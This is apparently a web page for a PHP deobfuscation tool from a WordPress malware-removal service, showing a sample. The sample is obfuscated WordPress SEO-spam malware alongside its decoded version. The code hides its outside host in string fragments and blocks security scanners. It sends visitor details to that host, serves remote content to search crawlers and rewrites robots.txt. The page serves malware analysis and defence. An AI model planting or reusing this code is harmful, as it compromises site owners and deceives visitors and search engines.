Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $swkm='m/';$hlme='h';$qkrh='p://cw1475.smoo';$clga='tt';$kgzs='than.co';$zqnwd=$hlme.$clga.$qkrh.$kgzs.$swkm; $pc = "AgBRBgq"; $bagent = "Yahoo|Google|Docomo|Bing"; error_reporting(0); if(preg_match("/(LightDeckReports Bot|Python-urllib|Java|Go-http-client|Paloaltonetworks|Indy Library|ahrefsBot|CrawlDaddy|DigExt|OBot|SeznamBot|UniversalFeedParser|Python|AskTbFXTV|semrushBot|Bytespider|Scrapy|PetalBot|Swiftbot|DataForSEO|coolpadWebkit|ApacheBench|CensysInspect|mj12bot|Jaunty|EasouSpider|ZmEu|heritrix|feedDemon|Python-requests|yySpider|ezooms|feedly|DotBot|amazonBot|yisouSpider|JikeSpider|YandexBot|Barkrowler|HttpClient|GPTBot)/i", $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 403 Forbidden'); exit(); } $refer = urlencode(@$_SERVER['HTTP_REFERER']); $uagent = urlencode($_SERVER['HTTP_USER_AGENT']); $language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']); $ip = $_SERVER['REMOTE_ADDR']; if (isset($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } $ip = urlencode($ip); $domain = urlencode($_SERVER['HTTP_HOST']); $script = urlencode($_SERVER['SCRIPT_NAME']); if ((!empty($_SERVER['REQUEST_SCHEME']) and $_SERVER['REQUEST_SCHEME'] == 'https') or (!empty($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on') or (!empty($_SERVER['SERVER_PORT']) and $_SERVER['SERVER_PORT'] == '443') or (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) { $_SERVER['REQUEST_SCHEME'] = 'https'; } else { $_SERVER['REQUEST_SCHEME'] = 'http'; } $http = urlencode($_SERVER['REQUEST_SCHEME']); $uri = urlencode($_SERVER['REQUEST_URI']); if(strpos($uri,"xvyxvy") !== false){echo "ok";exit();} $xvy = 0; $xvyFilePath = "xvy.txt"; if(!is_file($xvyFilePath)) { $uuu = $http.'://'.$_SERVER['HTTP_HOST'].'/xvyxvy'; $vaum = @file_get_contents($uuu); if($vaum === "ok") { $xvy = 1; writeToFile($xvyFilePath,"1"); } else { $xvy = 0; writeToFile($xvyFilePath,"0"); } } else { $xvy = readFromFile($xvyFilePath); } function writeToFile($filePath, $content) { $file = fopen($filePath, "w"); if ($file) { fwrite($file, $content); fclose($file); return true; } return false; } function readFromFile($filePath) { $file = fopen($filePath, "r"); if ($file) { $content = fread($file, filesize($filePath)); fclose($file); return $content; } return false; } if(strpos($uri,"favicon.ico") !== false) { } else if(strpos($uri,"robots.txt") !== false or strpos($uri,"pingsitemap") !== false or strpos($uri,"jp2023") !== false or preg_match("@^/(.*?).xml$@i", $_SERVER['REQUEST_URI']) or preg_match("/($bagent)/i", $_SERVER['HTTP_USER_AGENT']) or preg_match("/($bagent)/i", $_SERVER['HTTP_REFERER'])) { $requsturl = $zqnwd."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$xvy&script=$script"; $robots_contents = ""; if(strpos($uri,"pingsitemap") !== false) { $scripname = $_SERVER['SCRIPT_NAME']; if(strpos($scripname,"index.ph") !== false) { if($xvy == 0) { $scripname = '/?'; } else { $scripname = '/'; } } else { $scripname = $scripname.'?'; } $robots_contents = "User-agent: *\r\nAllow: /"; $sitemap = "$http://" . $domain .$scripname. "sitemap.xml"; $robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap"; $sitemapstatus = ""; echo $sitemap.": ".$sitemapstatus.'<br/>'; $requsturl = $zqnwd."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$xvy&script=$script&sitemap=".urlencode($sitemap); } $vaum = @file_get_contents($requsturl); if(empty($vaum)) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $requsturl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); $vaum = curl_exec($ch); curl_close($ch); } if(!empty($vaum)) { if(substr($vaum,0,10)=="error code"||$vaum == "500") { header("HTTP/1.0 500 Internal Server Error"); exit(); } if(strpos($uri,"jp2023") !== false){header('HTTP/1.1 404 Not Found');} else if(substr($vaum,0,5)=="<?xml") { header('Content-Type: text/xml; charset=utf-8'); } else { header('Content-Type: text/html; charset=utf-8'); } echo $vaum; if(!empty($robots_contents)){writeToFile("robots.txt",$robots_contents);} else if(strpos($uri,"robots.txt") !== false){writeToFile("robots.txt",$vaum);} exit(); return; } }else{ } ?><?php
$swkm = 'm/';
$hlme = 'h';
$qkrh = 'p://cw1475.smoo';
$clga = 'tt';
$kgzs = 'than.co';
$zqnwd = "http://cw1475.smoothan.com/";
$pc = "AgBRBgq";
$bagent = "Yahoo|Google|Docomo|Bing";
error_reporting(0);
if (preg_match("/(LightDeckReports Bot|Python-urllib|Java|Go-http-client|Paloaltonetworks|Indy Library|ahrefsBot|CrawlDaddy|DigExt|OBot|SeznamBot|UniversalFeedParser|Python|AskTbFXTV|semrushBot|Bytespider|Scrapy|PetalBot|Swiftbot|DataForSEO|coolpadWebkit|ApacheBench|CensysInspect|mj12bot|Jaunty|EasouSpider|ZmEu|heritrix|feedDemon|Python-requests|yySpider|ezooms|feedly|DotBot|amazonBot|yisouSpider|JikeSpider|YandexBot|Barkrowler|HttpClient|GPTBot)/i", $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 403 Forbidden');
exit;
}
$refer = urlencode(@$_SERVER['HTTP_REFERER']);
$uagent = urlencode($_SERVER['HTTP_USER_AGENT']);
$language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']);
$ip = $_SERVER['REMOTE_ADDR'];
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
$ip = urlencode($ip);
$domain = urlencode($_SERVER['HTTP_HOST']);
$script = urlencode($_SERVER['SCRIPT_NAME']);
if (!empty($_SERVER['REQUEST_SCHEME']) and $_SERVER['REQUEST_SCHEME'] == 'https' or !empty($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on' or !empty($_SERVER['SERVER_PORT']) and $_SERVER['SERVER_PORT'] == '443' or isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') {
$_SERVER['REQUEST_SCHEME'] = 'https';
} else {
$_SERVER['REQUEST_SCHEME'] = 'http';
}
$http = urlencode($_SERVER['REQUEST_SCHEME']);
$uri = urlencode($_SERVER['REQUEST_URI']);
if (strpos($uri, "xvyxvy") !== false) {
echo "ok";
exit;
}
$xvy = 0;
$xvyFilePath = "xvy.txt";
if (!is_file($xvyFilePath)) {
$uuu = $http . '://' . $_SERVER['HTTP_HOST'] . '/xvyxvy';
$vaum = @file_get_contents($uuu);
if ($vaum === "ok") {
$xvy = 1;
writeToFile($xvyFilePath, "1");
} else {
$xvy = 0;
writeToFile($xvyFilePath, "0");
}
} else {
$xvy = readFromFile($xvyFilePath);
}
function writeToFile($filePath, $content)
{
$file = fopen($filePath, "w");
if ($file) {
fwrite($file, $content);
fclose($file);
return true;
}
return false;
}
function readFromFile($filePath)
{
$file = fopen($filePath, "r");
if ($file) {
$content = fread($file, filesize($filePath));
fclose($file);
return $content;
}
return false;
}
if (strpos($uri, "favicon.ico") !== false) {
} else {
if (strpos($uri, "robots.txt") !== false or strpos($uri, "pingsitemap") !== false or strpos($uri, "jp2023") !== false or preg_match("@^/(.*?).xml\$@i", $_SERVER['REQUEST_URI']) or preg_match("/({$bagent})/i", $_SERVER['HTTP_USER_AGENT']) or preg_match("/({$bagent})/i", $_SERVER['HTTP_REFERER'])) {
$requsturl = $zqnwd . "?agent={$uagent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$xvy}&script={$script}";
$robots_contents = "";
if (strpos($uri, "pingsitemap") !== false) {
$scripname = $_SERVER['SCRIPT_NAME'];
if (strpos($scripname, "index.ph") !== false) {
if ($xvy == 0) {
$scripname = '/?';
} else {
$scripname = '/';
}
} else {
$scripname .= '?';
}
$robots_contents = "User-agent: *\r\nAllow: /";
$sitemap = "{$http}://" . $domain . $scripname . "sitemap.xml";
$robots_contents = trim($robots_contents) . "\r\n" . "Sitemap: {$sitemap}";
$sitemapstatus = "";
echo $sitemap . ": " . $sitemapstatus . '<br/>';
$requsturl = $zqnwd . "?agent={$uagent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$xvy}&script={$script}&sitemap=" . urlencode($sitemap);
}
$vaum = @file_get_contents($requsturl);
if (empty($vaum)) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $requsturl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
$vaum = curl_exec($ch);
curl_close($ch);
}
if (!empty($vaum)) {
if (substr($vaum, 0, 10) == "error code" || $vaum == "500") {
header("HTTP/1.0 500 Internal Server Error");
exit;
}
if (strpos($uri, "jp2023") !== false) {
header('HTTP/1.1 404 Not Found');
} else {
if (substr($vaum, 0, 5) == "<?php xml") {
header('Content-Type: text/xml; charset=utf-8');
} else {
header('Content-Type: text/html; charset=utf-8');
}
}
echo $vaum;
if (!empty($robots_contents)) {
writeToFile("robots.txt", $robots_contents);
} else {
if (strpos($uri, "robots.txt") !== false) {
writeToFile("robots.txt", $vaum);
}
}
exit;
}
} else {
}
}Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.